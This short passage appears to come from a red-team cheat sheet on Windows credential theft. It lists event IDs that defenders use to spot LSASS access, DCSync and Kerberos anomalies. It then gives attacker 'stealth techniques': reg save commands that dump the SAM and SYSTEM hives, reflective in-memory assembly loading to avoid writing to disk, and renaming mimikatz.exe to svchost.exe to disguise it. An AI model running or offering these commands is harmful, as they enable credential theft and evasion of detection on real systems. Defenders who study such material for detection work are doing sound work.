⚠️ Detection & OPSEC

🚨 High-Risk Indicators

Event 4624/4776: Privileged logon with SeDebugPrivilege
Event 10: LSASS.exe memory access patterns
Event 4662: DCSync operations
Event 4768/4769: Kerberos tickets with abnormal encryption types

🛡️ Stealth Techniques

# Use built-in tools
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Avoid dropping to disk
[System.Reflection.Assembly]::Load([byte[]])

# Obfuscate process names
Copy-Item mimikatz.exe svchost.exe